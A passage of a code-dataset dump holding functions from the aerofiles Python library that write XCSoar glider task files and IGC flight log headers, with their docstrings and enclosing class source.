repository_name stringclasses 316 values | func_path_in_repository stringlengths 6 223 | func_name stringlengths 1 134 | language stringclasses 1 value | func_code_string stringlengths 57 65.5k | func_documentation_string stringlengths 1 46.3k | split_name stringclasses 1 value | func_code_url stringlengths 91 315 | called_functions listlengths 1 156 ⌀ | enclosing_scope stringlengths 2 1.48M |
|---|---|---|---|---|---|---|---|---|---|
Turbo87/aerofiles | aerofiles/xcsoar/writer.py | Writer.write_task | python | def write_task(self, **kw):
self.convert_timedelta(kw, 'aat_min_time')
self.convert_time(kw, 'start_open_time')
self.convert_time(kw, 'start_close_time')
self.convert_bool(kw, 'fai_finish')
self.convert_bool(kw, 'start_requires_arm')
return self.write_tag_with_content('Task', **kw) | Write the main task to the file::
with writer.write_task(type=TaskType.RACING):
...
# <Task type="RT"> ... </Task>
Inside the with clause the :meth:`~aerofiles.xcsoar.Writer.write_point`
method should be used to write the individual task points. All
parameters are optional.
:param type: type of the task (one of the constants in
:class:`~aerofiles.xcsoar.constants.TaskType`)
:param start_requires_arm: ``True``: start has to be armed manually,
``False``: task will be started automatically
:param start_max_height: maximum altitude when the task is started
(in m)
:param start_max_height_ref: altitude reference of
``start_max_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param start_max_speed: maximum speed when the task is started (in m/s)
:param start_open_time: time that the start line opens as
:class:`datetime.time`
:param start_close_time: time that the start line is closing as
:class:`datetime.time`
:param aat_min_time: AAT time as :class:`datetime.timedelta`
:param finish_min_height: minimum altitude when the task is finished
(in m)
:param finish_min_height_ref: altitude reference of
``finish_min_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param fai_finish: ``True``: FAI finish rules apply | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/xcsoar/writer.py#L62-L104 | [
"def convert_bool(self, kw, key):\n if key in kw:\n value = kw[key]\n if isinstance(value, bool):\n kw[key] = (1 if value else 0)\n",
"def convert_time(self, kw, key):\n if key in kw:\n value = kw[key]\n if isinstance(value, datetime.time):\n kw[key] = value... | class Writer:
"""
A writer class for the `XCSoar <http://www.xcsoar.org>`_ task file format::
with open('task.tsk', 'w') as fp:
writer = Writer(fp)
This task file format contains one task per file. Writing more than one
task will cause an exception. A task can be written by using the
:meth:`~aerofiles.xcsoar.Writer.write_task` method.
"""
def __init__(self, fp, encoding='utf-8'):
self.fp = fp
self.encoding = encoding
self.indent_level = 0
def write_line(self, line):
indent = '\t' * self.indent_level
self.fp.write((indent + line + '\n').encode(self.encoding))
def format_tag_content(self, _name, **kw):
params = list(map(lambda item: '%s="%s"' % item, kw.items()))
params.sort()
return _name + ' ' + ' '.join(params)
def convert_bool(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, bool):
kw[key] = (1 if value else 0)
def convert_time(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.time):
kw[key] = value.strftime('%H:%M')
def convert_timedelta(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.timedelta):
kw[key] = value.seconds
@contextmanager
def write_tag_with_content(self, _name, **kw):
self.write_line('<%s>' % self.format_tag_content(_name, **kw))
self.indent_level += 1
yield
self.indent_level -= 1
self.write_line('</%s>' % _name)
def write_tag(self, _name, **kw):
self.write_line('<%s/>' % self.format_tag_content(_name, **kw))
def write_point(self, **kw):
"""
Write a task point to the file::
with writer.write_point(type=PointType.TURN):
writer.write_waypoint(...)
writer.write_observation_zone(...)
# <Point type="Turn"> ... </Point>
Inside the with clause the
:meth:`~aerofiles.xcsoar.Writer.write_waypoint` and
:meth:`~aerofiles.xcsoar.Writer.write_observation_zone` methods must be
used to write the details of the task point.
:param type: type of the task point (one of the constants in
:class:`~aerofiles.xcsoar.constants.PointType`)
"""
assert 'type' in kw
self.convert_bool(kw, 'score_exit')
return self.write_tag_with_content('Point', **kw)
def write_waypoint(self, **kw):
"""
Write a waypoint to the file::
writer.write_waypoint(
name='Meiersberg',
latitude=51.4,
longitude=7.1
)
# <Waypoint name="Meiersberg">
# <Location latitude="51.4" longitude="7.1"/>
# </Waypoint>
:param name: name of the waypoint
:param latitude: latitude of the waypoint (in WGS84)
:param longitude: longitude of the waypoint (in WGS84)
:param altitude: altitude of the waypoint (in m, optional)
:param id: internal id of the waypoint (optional)
:param comment: extended description of the waypoint (optional)
"""
assert 'name' in kw
assert 'latitude' in kw
assert 'longitude' in kw
location_kw = {
'latitude': kw['latitude'],
'longitude': kw['longitude'],
}
del kw['latitude']
del kw['longitude']
with self.write_tag_with_content('Waypoint', **kw):
self.write_tag('Location', **location_kw)
def write_observation_zone(self, **kw):
"""
Write an observation zone declaration to the file::
writer.write_observation_zone(
type=ObservationZoneType.CYLINDER,
radius=30000,
)
# <ObservationZone type="Cylinder" radius="30000"/>
The required parameters depend on the type parameter. Different
observation zone types require different parameters.
:param type: observation zone type (one of the constants in
:class:`~aerofiles.xcsoar.constants.ObservationZoneType`)
:param length: length of the line
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.LINE`)
:param radius: (outer) radius of the observation zone
(used with types
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CYLINDER`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SYMMETRIC_QUADRANT` and
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param inner_radius: inner radius of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param angle: angle of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param start_radial: start radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`)
:param end_radial: end radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`)
"""
assert 'type' in kw
if kw['type'] == ObservationZoneType.LINE:
assert 'length' in kw
elif kw['type'] == ObservationZoneType.CYLINDER:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.SECTOR:
assert 'radius' in kw
assert 'start_radial' in kw
assert 'end_radial' in kw
elif kw['type'] == ObservationZoneType.SYMMETRIC_QUADRANT:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.CUSTOM_KEYHOLE:
assert 'radius' in kw
assert 'inner_radius' in kw
assert 'angle' in kw
self.write_tag('ObservationZone', **kw)
|
Turbo87/aerofiles | aerofiles/xcsoar/writer.py | Writer.write_point | python | def write_point(self, **kw):
assert 'type' in kw
self.convert_bool(kw, 'score_exit')
return self.write_tag_with_content('Point', **kw) | Write a task point to the file::
with writer.write_point(type=PointType.TURN):
writer.write_waypoint(...)
writer.write_observation_zone(...)
# <Point type="Turn"> ... </Point>
Inside the with clause the
:meth:`~aerofiles.xcsoar.Writer.write_waypoint` and
:meth:`~aerofiles.xcsoar.Writer.write_observation_zone` methods must be
used to write the details of the task point.
:param type: type of the task point (one of the constants in
:class:`~aerofiles.xcsoar.constants.PointType`) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/xcsoar/writer.py#L106-L129 | [
"def convert_bool(self, kw, key):\n if key in kw:\n value = kw[key]\n if isinstance(value, bool):\n kw[key] = (1 if value else 0)\n"
] | class Writer:
"""
A writer class for the `XCSoar <http://www.xcsoar.org>`_ task file format::
with open('task.tsk', 'w') as fp:
writer = Writer(fp)
This task file format contains one task per file. Writing more than one
task will cause an exception. A task can be written by using the
:meth:`~aerofiles.xcsoar.Writer.write_task` method.
"""
def __init__(self, fp, encoding='utf-8'):
self.fp = fp
self.encoding = encoding
self.indent_level = 0
def write_line(self, line):
indent = '\t' * self.indent_level
self.fp.write((indent + line + '\n').encode(self.encoding))
def format_tag_content(self, _name, **kw):
params = list(map(lambda item: '%s="%s"' % item, kw.items()))
params.sort()
return _name + ' ' + ' '.join(params)
def convert_bool(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, bool):
kw[key] = (1 if value else 0)
def convert_time(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.time):
kw[key] = value.strftime('%H:%M')
def convert_timedelta(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.timedelta):
kw[key] = value.seconds
@contextmanager
def write_tag_with_content(self, _name, **kw):
self.write_line('<%s>' % self.format_tag_content(_name, **kw))
self.indent_level += 1
yield
self.indent_level -= 1
self.write_line('</%s>' % _name)
def write_tag(self, _name, **kw):
self.write_line('<%s/>' % self.format_tag_content(_name, **kw))
def write_task(self, **kw):
"""
Write the main task to the file::
with writer.write_task(type=TaskType.RACING):
...
# <Task type="RT"> ... </Task>
Inside the with clause the :meth:`~aerofiles.xcsoar.Writer.write_point`
method should be used to write the individual task points. All
parameters are optional.
:param type: type of the task (one of the constants in
:class:`~aerofiles.xcsoar.constants.TaskType`)
:param start_requires_arm: ``True``: start has to be armed manually,
``False``: task will be started automatically
:param start_max_height: maximum altitude when the task is started
(in m)
:param start_max_height_ref: altitude reference of
``start_max_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param start_max_speed: maximum speed when the task is started (in m/s)
:param start_open_time: time that the start line opens as
:class:`datetime.time`
:param start_close_time: time that the start line is closing as
:class:`datetime.time`
:param aat_min_time: AAT time as :class:`datetime.timedelta`
:param finish_min_height: minimum altitude when the task is finished
(in m)
:param finish_min_height_ref: altitude reference of
``finish_min_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param fai_finish: ``True``: FAI finish rules apply
"""
self.convert_timedelta(kw, 'aat_min_time')
self.convert_time(kw, 'start_open_time')
self.convert_time(kw, 'start_close_time')
self.convert_bool(kw, 'fai_finish')
self.convert_bool(kw, 'start_requires_arm')
return self.write_tag_with_content('Task', **kw)
def write_waypoint(self, **kw):
"""
Write a waypoint to the file::
writer.write_waypoint(
name='Meiersberg',
latitude=51.4,
longitude=7.1
)
# <Waypoint name="Meiersberg">
# <Location latitude="51.4" longitude="7.1"/>
# </Waypoint>
:param name: name of the waypoint
:param latitude: latitude of the waypoint (in WGS84)
:param longitude: longitude of the waypoint (in WGS84)
:param altitude: altitude of the waypoint (in m, optional)
:param id: internal id of the waypoint (optional)
:param comment: extended description of the waypoint (optional)
"""
assert 'name' in kw
assert 'latitude' in kw
assert 'longitude' in kw
location_kw = {
'latitude': kw['latitude'],
'longitude': kw['longitude'],
}
del kw['latitude']
del kw['longitude']
with self.write_tag_with_content('Waypoint', **kw):
self.write_tag('Location', **location_kw)
def write_observation_zone(self, **kw):
"""
Write an observation zone declaration to the file::
writer.write_observation_zone(
type=ObservationZoneType.CYLINDER,
radius=30000,
)
# <ObservationZone type="Cylinder" radius="30000"/>
The required parameters depend on the type parameter. Different
observation zone types require different parameters.
:param type: observation zone type (one of the constants in
:class:`~aerofiles.xcsoar.constants.ObservationZoneType`)
:param length: length of the line
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.LINE`)
:param radius: (outer) radius of the observation zone
(used with types
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CYLINDER`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SYMMETRIC_QUADRANT` and
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param inner_radius: inner radius of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param angle: angle of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param start_radial: start radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`)
:param end_radial: end radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`)
"""
assert 'type' in kw
if kw['type'] == ObservationZoneType.LINE:
assert 'length' in kw
elif kw['type'] == ObservationZoneType.CYLINDER:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.SECTOR:
assert 'radius' in kw
assert 'start_radial' in kw
assert 'end_radial' in kw
elif kw['type'] == ObservationZoneType.SYMMETRIC_QUADRANT:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.CUSTOM_KEYHOLE:
assert 'radius' in kw
assert 'inner_radius' in kw
assert 'angle' in kw
self.write_tag('ObservationZone', **kw)
|
Turbo87/aerofiles | aerofiles/xcsoar/writer.py | Writer.write_waypoint | python | def write_waypoint(self, **kw):
assert 'name' in kw
assert 'latitude' in kw
assert 'longitude' in kw
location_kw = {
'latitude': kw['latitude'],
'longitude': kw['longitude'],
}
del kw['latitude']
del kw['longitude']
with self.write_tag_with_content('Waypoint', **kw):
self.write_tag('Location', **location_kw) | Write a waypoint to the file::
writer.write_waypoint(
name='Meiersberg',
latitude=51.4,
longitude=7.1
)
# <Waypoint name="Meiersberg">
# <Location latitude="51.4" longitude="7.1"/>
# </Waypoint>
:param name: name of the waypoint
:param latitude: latitude of the waypoint (in WGS84)
:param longitude: longitude of the waypoint (in WGS84)
:param altitude: altitude of the waypoint (in m, optional)
:param id: internal id of the waypoint (optional)
:param comment: extended description of the waypoint (optional) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/xcsoar/writer.py#L131-L166 | [
"def write_tag(self, _name, **kw):\n self.write_line('<%s/>' % self.format_tag_content(_name, **kw))\n"
] | class Writer:
"""
A writer class for the `XCSoar <http://www.xcsoar.org>`_ task file format::
with open('task.tsk', 'w') as fp:
writer = Writer(fp)
This task file format contains one task per file. Writing more than one
task will cause an exception. A task can be written by using the
:meth:`~aerofiles.xcsoar.Writer.write_task` method.
"""
def __init__(self, fp, encoding='utf-8'):
self.fp = fp
self.encoding = encoding
self.indent_level = 0
def write_line(self, line):
indent = '\t' * self.indent_level
self.fp.write((indent + line + '\n').encode(self.encoding))
def format_tag_content(self, _name, **kw):
params = list(map(lambda item: '%s="%s"' % item, kw.items()))
params.sort()
return _name + ' ' + ' '.join(params)
def convert_bool(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, bool):
kw[key] = (1 if value else 0)
def convert_time(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.time):
kw[key] = value.strftime('%H:%M')
def convert_timedelta(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.timedelta):
kw[key] = value.seconds
@contextmanager
def write_tag_with_content(self, _name, **kw):
self.write_line('<%s>' % self.format_tag_content(_name, **kw))
self.indent_level += 1
yield
self.indent_level -= 1
self.write_line('</%s>' % _name)
def write_tag(self, _name, **kw):
self.write_line('<%s/>' % self.format_tag_content(_name, **kw))
def write_task(self, **kw):
"""
Write the main task to the file::
with writer.write_task(type=TaskType.RACING):
...
# <Task type="RT"> ... </Task>
Inside the with clause the :meth:`~aerofiles.xcsoar.Writer.write_point`
method should be used to write the individual task points. All
parameters are optional.
:param type: type of the task (one of the constants in
:class:`~aerofiles.xcsoar.constants.TaskType`)
:param start_requires_arm: ``True``: start has to be armed manually,
``False``: task will be started automatically
:param start_max_height: maximum altitude when the task is started
(in m)
:param start_max_height_ref: altitude reference of
``start_max_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param start_max_speed: maximum speed when the task is started (in m/s)
:param start_open_time: time that the start line opens as
:class:`datetime.time`
:param start_close_time: time that the start line is closing as
:class:`datetime.time`
:param aat_min_time: AAT time as :class:`datetime.timedelta`
:param finish_min_height: minimum altitude when the task is finished
(in m)
:param finish_min_height_ref: altitude reference of
``finish_min_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param fai_finish: ``True``: FAI finish rules apply
"""
self.convert_timedelta(kw, 'aat_min_time')
self.convert_time(kw, 'start_open_time')
self.convert_time(kw, 'start_close_time')
self.convert_bool(kw, 'fai_finish')
self.convert_bool(kw, 'start_requires_arm')
return self.write_tag_with_content('Task', **kw)
def write_point(self, **kw):
"""
Write a task point to the file::
with writer.write_point(type=PointType.TURN):
writer.write_waypoint(...)
writer.write_observation_zone(...)
# <Point type="Turn"> ... </Point>
Inside the with clause the
:meth:`~aerofiles.xcsoar.Writer.write_waypoint` and
:meth:`~aerofiles.xcsoar.Writer.write_observation_zone` methods must be
used to write the details of the task point.
:param type: type of the task point (one of the constants in
:class:`~aerofiles.xcsoar.constants.PointType`)
"""
assert 'type' in kw
self.convert_bool(kw, 'score_exit')
return self.write_tag_with_content('Point', **kw)
def write_observation_zone(self, **kw):
"""
Write an observation zone declaration to the file::
writer.write_observation_zone(
type=ObservationZoneType.CYLINDER,
radius=30000,
)
# <ObservationZone type="Cylinder" radius="30000"/>
The required parameters depend on the type parameter. Different
observation zone types require different parameters.
:param type: observation zone type (one of the constants in
:class:`~aerofiles.xcsoar.constants.ObservationZoneType`)
:param length: length of the line
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.LINE`)
:param radius: (outer) radius of the observation zone
(used with types
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CYLINDER`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SYMMETRIC_QUADRANT` and
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param inner_radius: inner radius of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param angle: angle of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param start_radial: start radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`)
:param end_radial: end radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`)
"""
assert 'type' in kw
if kw['type'] == ObservationZoneType.LINE:
assert 'length' in kw
elif kw['type'] == ObservationZoneType.CYLINDER:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.SECTOR:
assert 'radius' in kw
assert 'start_radial' in kw
assert 'end_radial' in kw
elif kw['type'] == ObservationZoneType.SYMMETRIC_QUADRANT:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.CUSTOM_KEYHOLE:
assert 'radius' in kw
assert 'inner_radius' in kw
assert 'angle' in kw
self.write_tag('ObservationZone', **kw)
|
Turbo87/aerofiles | aerofiles/xcsoar/writer.py | Writer.write_observation_zone | python | def write_observation_zone(self, **kw):
assert 'type' in kw
if kw['type'] == ObservationZoneType.LINE:
assert 'length' in kw
elif kw['type'] == ObservationZoneType.CYLINDER:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.SECTOR:
assert 'radius' in kw
assert 'start_radial' in kw
assert 'end_radial' in kw
elif kw['type'] == ObservationZoneType.SYMMETRIC_QUADRANT:
assert 'radius' in kw
elif kw['type'] == ObservationZoneType.CUSTOM_KEYHOLE:
assert 'radius' in kw
assert 'inner_radius' in kw
assert 'angle' in kw
self.write_tag('ObservationZone', **kw) | Write an observation zone declaration to the file::
writer.write_observation_zone(
type=ObservationZoneType.CYLINDER,
radius=30000,
)
# <ObservationZone type="Cylinder" radius="30000"/>
The required parameters depend on the type parameter. Different
observation zone types require different parameters.
:param type: observation zone type (one of the constants in
:class:`~aerofiles.xcsoar.constants.ObservationZoneType`)
:param length: length of the line
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.LINE`)
:param radius: (outer) radius of the observation zone
(used with types
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CYLINDER`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`,
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SYMMETRIC_QUADRANT` and
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param inner_radius: inner radius of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param angle: angle of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.CUSTOM_KEYHOLE`)
:param start_radial: start radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`)
:param end_radial: end radial of the observation zone
(only used with type
:const:`~aerofiles.xcsoar.constants.ObservationZoneType.SECTOR`) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/xcsoar/writer.py#L168-L229 | [
"def write_tag(self, _name, **kw):\n self.write_line('<%s/>' % self.format_tag_content(_name, **kw))\n"
] | class Writer:
"""
A writer class for the `XCSoar <http://www.xcsoar.org>`_ task file format::
with open('task.tsk', 'w') as fp:
writer = Writer(fp)
This task file format contains one task per file. Writing more than one
task will cause an exception. A task can be written by using the
:meth:`~aerofiles.xcsoar.Writer.write_task` method.
"""
def __init__(self, fp, encoding='utf-8'):
self.fp = fp
self.encoding = encoding
self.indent_level = 0
def write_line(self, line):
indent = '\t' * self.indent_level
self.fp.write((indent + line + '\n').encode(self.encoding))
def format_tag_content(self, _name, **kw):
params = list(map(lambda item: '%s="%s"' % item, kw.items()))
params.sort()
return _name + ' ' + ' '.join(params)
def convert_bool(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, bool):
kw[key] = (1 if value else 0)
def convert_time(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.time):
kw[key] = value.strftime('%H:%M')
def convert_timedelta(self, kw, key):
if key in kw:
value = kw[key]
if isinstance(value, datetime.timedelta):
kw[key] = value.seconds
@contextmanager
def write_tag_with_content(self, _name, **kw):
self.write_line('<%s>' % self.format_tag_content(_name, **kw))
self.indent_level += 1
yield
self.indent_level -= 1
self.write_line('</%s>' % _name)
def write_tag(self, _name, **kw):
self.write_line('<%s/>' % self.format_tag_content(_name, **kw))
def write_task(self, **kw):
"""
Write the main task to the file::
with writer.write_task(type=TaskType.RACING):
...
# <Task type="RT"> ... </Task>
Inside the with clause the :meth:`~aerofiles.xcsoar.Writer.write_point`
method should be used to write the individual task points. All
parameters are optional.
:param type: type of the task (one of the constants in
:class:`~aerofiles.xcsoar.constants.TaskType`)
:param start_requires_arm: ``True``: start has to be armed manually,
``False``: task will be started automatically
:param start_max_height: maximum altitude when the task is started
(in m)
:param start_max_height_ref: altitude reference of
``start_max_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param start_max_speed: maximum speed when the task is started (in m/s)
:param start_open_time: time that the start line opens as
:class:`datetime.time`
:param start_close_time: time that the start line is closing as
:class:`datetime.time`
:param aat_min_time: AAT time as :class:`datetime.timedelta`
:param finish_min_height: minimum altitude when the task is finished
(in m)
:param finish_min_height_ref: altitude reference of
``finish_min_height`` (one of the constants in
:class:`~aerofiles.xcsoar.constants.AltitudeReference`)
:param fai_finish: ``True``: FAI finish rules apply
"""
self.convert_timedelta(kw, 'aat_min_time')
self.convert_time(kw, 'start_open_time')
self.convert_time(kw, 'start_close_time')
self.convert_bool(kw, 'fai_finish')
self.convert_bool(kw, 'start_requires_arm')
return self.write_tag_with_content('Task', **kw)
def write_point(self, **kw):
"""
Write a task point to the file::
with writer.write_point(type=PointType.TURN):
writer.write_waypoint(...)
writer.write_observation_zone(...)
# <Point type="Turn"> ... </Point>
Inside the with clause the
:meth:`~aerofiles.xcsoar.Writer.write_waypoint` and
:meth:`~aerofiles.xcsoar.Writer.write_observation_zone` methods must be
used to write the details of the task point.
:param type: type of the task point (one of the constants in
:class:`~aerofiles.xcsoar.constants.PointType`)
"""
assert 'type' in kw
self.convert_bool(kw, 'score_exit')
return self.write_tag_with_content('Point', **kw)
def write_waypoint(self, **kw):
"""
Write a waypoint to the file::
writer.write_waypoint(
name='Meiersberg',
latitude=51.4,
longitude=7.1
)
# <Waypoint name="Meiersberg">
# <Location latitude="51.4" longitude="7.1"/>
# </Waypoint>
:param name: name of the waypoint
:param latitude: latitude of the waypoint (in WGS84)
:param longitude: longitude of the waypoint (in WGS84)
:param altitude: altitude of the waypoint (in m, optional)
:param id: internal id of the waypoint (optional)
:param comment: extended description of the waypoint (optional)
"""
assert 'name' in kw
assert 'latitude' in kw
assert 'longitude' in kw
location_kw = {
'latitude': kw['latitude'],
'longitude': kw['longitude'],
}
del kw['latitude']
del kw['longitude']
with self.write_tag_with_content('Waypoint', **kw):
self.write_tag('Location', **location_kw)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_logger_id | python | def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record) | Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L85-L117 | [
"def write_record(self, type, record):\n self.write_line(type + record)\n"
] | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
